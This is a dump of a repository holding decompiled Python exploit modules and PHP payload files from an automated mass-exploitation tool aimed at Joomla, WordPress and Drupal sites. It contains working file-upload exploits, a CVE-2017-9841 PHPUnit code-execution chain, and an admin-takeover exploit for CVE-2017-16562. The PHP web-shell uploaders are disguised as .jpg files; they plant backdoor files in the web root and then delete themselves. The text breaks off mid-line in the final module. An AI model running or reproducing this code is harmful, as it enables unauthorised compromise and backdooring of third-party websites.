requests.get('http://' + site + '/modules/megamenu/uploadify/up.php') 17 | if 'Vuln!!' in str(CheckShell.content): 18 | with open('result/Shell_results.txt', 'a') as writer: 19 | writer.write(site + '/modules/megamenu/uploadify/up.php' + '\n') 20 | return printModule.returnYes(site, 'N/A', 'megamenu Module', 'Joomla') 21 | return printModule.returnNo(site, 'N/A', 'megamenu Module', 'Joomla') 22 | except: 23 | return printModule.returnNo(site, 'N/A', 'megamenu Module', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_jwallpapers.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_jwallpapers.py 6 | import requests 7 | from Exploits import printModule 8 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 9 | } 10 | 11 | def Exploit(site): 12 | try: 13 | PostFile = {'file': open('files/up.php', 'rb') 14 | } 15 | requests.post('http://' + site + '/index.php?option=com_jwallpapers&task=upload', files=PostFile, timeout=10, headers=Headers) 16 | CheckShell = requests.get('http://' + site + '/jwallpapers_files/plupload/up.php', timeout=10, headers=Headers) 17 | if 'Vuln!!' in str(CheckShell.content): 18 | with open('result/Shell_results.txt', 'a') as writer: 19 | writer.write(site + '/jwallpapers_files/plupload/up.php' + '\n') 20 | return printModule.returnYes(site, 'N/A', 'Com_jwallpapers', 'Joomla') 21 | return printModule.returnNo(site, 'N/A', 'Com_jwallpapers', 'Joomla') 22 | except: 23 | return printModule.returnNo(site, 'N/A', 'Com_jwallpapers', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_prh_api.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_prh_api.py 6 | import requests 7 | from Exploits import printModule 8 | from Exploits import CVE_2017_9841PHPUnit 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/wp-content/plugins/prh-api/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/wp-content/plugins/prh-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'prh-api', 'Wordpress') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit prh-api', 'Wordpress') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit prh-api', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Drupal_mailchimp.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Drupal_mailchimp.py 6 | import requests 7 | from Exploits import CVE_2017_9841PHPUnit 8 | from Exploits import printModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'mailchimp', 'Drupal') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mailchimp', 'Drupal') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mailchimp', 'Drupal') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_cloudflare.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_cloudflare.py 6 | import requests 7 | from Exploits import printModule 8 | from Exploits import CVE_2017_9841PHPUnit 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'cloudflare', 'Wordpress') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit cloudflare', 'Wordpress') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit cloudflare', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_mmplugin.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_mmplugin.py 6 | import requests 7 | from Exploits import printModule 8 | from Exploits import CVE_2017_9841PHPUnit 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'mm-plugin', 'Wordpress') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mm-plugin', 'Wordpress') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mm-plugin', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/phpcurlclass.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\phpcurlclass.py 6 | import requests 7 | from Exploits import CVE_2017_9841PHPUnit 8 | from Exploits import printModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/sites/all/libraries/php-curl-class/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/sites/all/libraries/php-curl-class/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'php-curl-class', 'Drupal') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit php-curl-class', 'Drupal') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit php-curl-class', 'Drupal') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wprealia.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wprealia.py 6 | import requests 7 | from Exploits import CVE_2017_9841PHPUnit 8 | from Exploits import printModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'realia', 'Wordpress') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit realia', 'Wordpress') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit realia', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/WPJekyll_Exporter.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\WPJekyll_Exporter.py 6 | import requests 7 | from Exploits import CVE_2017_9841PHPUnit 8 | from Exploits import printModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'jekyll-exporter', 'Wordpress') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit jekyll-exporter', 'Wordpress') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit jekyll-exporter', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_enfold_child.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_enfold_child.py 6 | import requests 7 | from Exploits import printModule 8 | from Exploits import CVE_2017_9841PHPUnit 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'enfold-child', 'Wordpress') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit enfold-child', 'Wordpress') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit enfold-child', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_dzs_videogallery.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_dzs_videogallery.py 6 | import requests 7 | from Exploits import printModule 8 | from Exploits import CVE_2017_9841PHPUnit 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'dzs-videogallery', 'Wordpress') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit dzs-videogallery', 'Wordpress') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit dzs-videogallery', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_contabileads.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_contabileads.py 6 | import requests 7 | from Exploits import printModule 8 | from Exploits import CVE_2017_9841PHPUnit 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/wp-content/plugins/contabileads/integracoes/mautic/api-library/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/wp-content/plugins/contabileads/integracoes/mautic/api-library/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'contabileads', 'Wordpress') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit contabileads', 'Wordpress') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit contabileads', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wpwoocommercesoftware.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wpwoocommercesoftware.py 6 | import requests 7 | from Exploits import CVE_2017_9841PHPUnit 8 | from Exploits import printModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site): 20 | try: 21 | vv = site + '/wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'woocommerce-software', 'Wordpress') 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit woocommerce-software', 'Wordpress') 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit woocommerce-software', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/files/vuln.php3.j: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! 2 | Vuln!! patch it Now!\';echo \'\';if( $_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "Shell Uploaded ! :)

"; }else { echo "Not uploaded !

"; }}?>'; 13 | $check = $_SERVER['DOCUMENT_ROOT'] . "/images/vuln.php" ; 14 | $text = $s; 15 | $open = fopen($check, 'w'); 16 | fwrite($open, $text); 17 | fclose($open); 18 | if(file_exists($check)){ 19 | echo $check."
"; 20 | }else 21 | echo "not exits"; 22 | echo "done .\n " ; 23 | 24 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm" ; 25 | $text2 = 'Vuln!! patch it Now!'; 26 | $open2 = fopen($check2, 'w'); 27 | fwrite($open2, $text2); 28 | fclose($open2); 29 | if(file_exists($check2)){ 30 | echo $check2."
"; 31 | }else 32 | echo "not exits"; 33 | echo "done .\n " ; 34 | @unlink(__FILE__); 35 | ?> -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2017_16562userpro.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\CVE_2017_16562userpro.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import shellupload 9 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0' 10 | } 11 | 12 | def Exploit(site): 13 | try: 14 | exploit = '/?up_auto_log=true' 15 | sess = requests.session() 16 | sess.get('http://' + site, timeout=10, headers=Headers) 17 | admin_re_page = 'http://' + site + '/wp-admin/' 18 | sess.get('http://' + site + exploit, timeout=10, headers=Headers) 19 | Check_login = sess.get(admin_re_page, timeout=10, headers=Headers) 20 | if '
  • ' in str(Check_login.content): 21 | with open('result/AdminTakeover_results.txt', 'a') as writer: 22 | writer.write(site + exploit + '\n') 23 | shellupload.UploadshellWordpress(site, sess) 24 | return printModule.returnYes(site, 'CVE-2017-16562', 'Wordpress Userpro', 'Wordpress') 25 | return printModule.returnNo(site, 'CVE-2017-16562', 'Wordpress Userpro', 'Wordpress') 26 | except: 27 | return printModule.returnNo(site, 'CVE-2017-16562', 'Wordpress Userpro', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/files/OsComPayLoad.php: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! @Kovacs07 2 | Vuln!! patch it Now!\';echo \'\';if( $_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "Shell Uploaded ! :)

    "; }else { echo "Not uploaded !

    "; }}?>'; 14 | $check = $_SERVER['DOCUMENT_ROOT'] . "/vuln.php"; 15 | $text = $s; 16 | $open = fopen($check, 'w'); 17 | fwrite($open, $text); 18 | fclose($open); 19 | if (file_exists($check)) { 20 | echo $check . "
    "; 21 | } else 22 | echo "not exits"; 23 | echo "done .\n "; 24 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm"; 25 | $text2 = 'Vuln!! patch it Now!'; 26 | $open2 = fopen($check2, 'w'); 27 | fwrite($open2, $text2); 28 | fclose($open2); 29 | if (file_exists($check2)) { 30 | echo $check2 . "
    "; 31 | } else 32 | echo "not exits"; 33 | echo "done .\n "; 34 | @unlink(__FILE__); 35 | ?> -------------------------------------------------------------------------------- /Files/Tool1/files/index.jpg: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! 2 | Vuln!! patch it Now!\';echo \'\';if( $_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "Shell Uploaded ! :)

    "; }else { echo "Not uploaded !

    "; }}?>'; 13 | $check = $_SERVER['DOCUMENT_ROOT'] . "/images/vuln.php" ; 14 | $text = $s; 15 | $open = fopen($check, 'w'); 16 | fwrite($open, $text); 17 | fclose($open); 18 | if(file_exists($check)){ 19 | echo $check."
    "; 20 | }else 21 | echo "not exits"; 22 | echo "done .\n " ; 23 | 24 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm" ; 25 | $text2 = 'Vuln!! patch it Now!'; 26 | $open2 = fopen($check2, 'w'); 27 | fwrite($open2, $text2); 28 | fclose($open2); 29 | if(file_exists($check2)){ 30 | echo $check2."
    "; 31 | }else 32 | echo "not exits"; 33 | echo "done .\n " ; 34 | 35 | @unlink(__FILE__); 36 | ?> 37 | -------------------------------------------------------------------------------- /Files/Tool1/files/grav.jpg: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! 2 | Vuln!! patch it Now!\';echo \'\';if( $_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "Shell Uploaded ! :)

    "; }else { echo "Not uploaded !

    "; }}?>'; 13 | $check = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/vuln.php"; 14 | $text = $s; 15 | $open = fopen($check, 'w'); 16 | fwrite($open, $text); 17 | fclose($open); 18 | if(file_exists($check)){ 19 | echo $check."
    "; 20 | }else 21 | echo "not exits"; 22 | echo "done .\n " ; 23 | 24 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm" ; 25 | $text2 = 'Vuln!! patch it Now!'; 26 | $open2 = fopen($check2, 'w'); 27 | fwrite($open2, $text2); 28 | fclose($open2); 29 | if(file_exists($check2)){ 30 | echo $check2."
    "; 31 | }else 32 | echo "not exits"; 33 | echo "done .\n " ; 34 | 35 | @unlink(__FILE__); 36 | ?> 37 | -------------------------------------------------------------------------------- /Files/Tool1/files/settings_auto.php: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! 2 | Vuln!! patch it Now!\';echo \'\';if( $_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "Shell Uploaded ! :)

    "; }else { echo "Not uploaded !

    "; }}?>'; 13 | $check = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/vuln.php"; 14 | $text = $s; 15 | $open = fopen($check, 'w'); 16 | fwrite($open, $text); 17 | fclose($open); 18 | if(file_exists($check)){ 19 | echo $check."
    "; 20 | }else 21 | echo "not exits"; 22 | echo "done .\n " ; 23 | 24 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm" ; 25 | $text2 = 'Vuln!! patch it Now!'; 26 | $open2 = fopen($check2, 'w'); 27 | fwrite($open2, $text2); 28 | fclose($open2); 29 | if(file_exists($check2)){ 30 | echo $check2."
    "; 31 | }else 32 | echo "not exits"; 33 | echo "done .\n " ; 34 | 35 | @unlink(__FILE__); 36 | ?> -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_bt_portfolio.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_bt_portfolio.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import wsoShellUploaderModule 9 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 10 | } 11 | 12 | def Exploit(site): 13 | try: 14 | PostFile = {'Filedata': open('files/up.php', 'rb') 15 | } 16 | requests.post('http://' + site + '/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php', files=PostFile, timeout=10, headers=Headers) 17 | CheckShell = requests.get('http://' + site + '/administrator/components/com_bt_portfolio/up.php', timeout=10, headers=Headers) 18 | if 'Vuln!!' in str(CheckShell.content): 19 | with open('result/Shell_results.txt', 'a') as writer: 20 | writer.write(site + '/administrator/components/com_bt_portfolio/up.php' + '\n') 21 | wsoShellUploaderModule.UploadWso2(site + '/administrator/components/com_bt_portfolio/up.php') 22 | return printModule.returnYes(site, 'N/A', 'com_bt_portfolio', 'Joomla') 23 | return printModule.returnNo(site, 'N/A', 'com_bt_portfolio', 'Joomla') 24 | except: 25 | return printModule.returnNo(site, 'N/A', 'com_bt_portfolio', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/mod_simplefileuploadv1.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\mod_simplefileuploadv1.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import wsoShellUploaderModule 9 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 10 | } 11 | 12 | def Exploit(site): 13 | try: 14 | PostFile = {'file': open('files/up.php', 'rb') 15 | } 16 | requests.post('http://' + site + '/modules/mod_simplefileuploadv1.3/elements/udd.php', files=PostFile, timeout=10, headers=Headers) 17 | CheckShell = requests.get('http://' + site + '/modules/mod_simplefileuploadv1.3/elements/up.php', timeout=10, headers=Headers) 18 | if 'Vuln!!' in str(CheckShell.content): 19 | with open('result/Shell_results.txt', 'a') as writer: 20 | writer.write(site + '/modules/mod_simplefileuploadv1.3/elements/up.php' + '\n') 21 | wsoShellUploaderModule.UploadWso2(site + '/modules/mod_simplefileuploadv1.3/elements/up.php') 22 | return printModule.returnYes(site, 'N/A', 'mod_simplefileuploadv Module', 'Joomla') 23 | return printModule.returnNo(site, 'N/A', 'mod_simplefileuploadv Module', 'Joomla') 24 | except: 25 | return printModule.returnNo(site, 'N/A', 'mod_simplefileuploadv Module', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/wp_miniaudioplayer.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\wp_miniaudioplayer.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | 17 | def Exploit(site): 18 | try: 19 | CheckVuln = requests.get('http://' + site, timeout=10, headers=Headers) 20 | if 'wp-miniaudioplayer' in CheckVuln.content: 21 | etc = 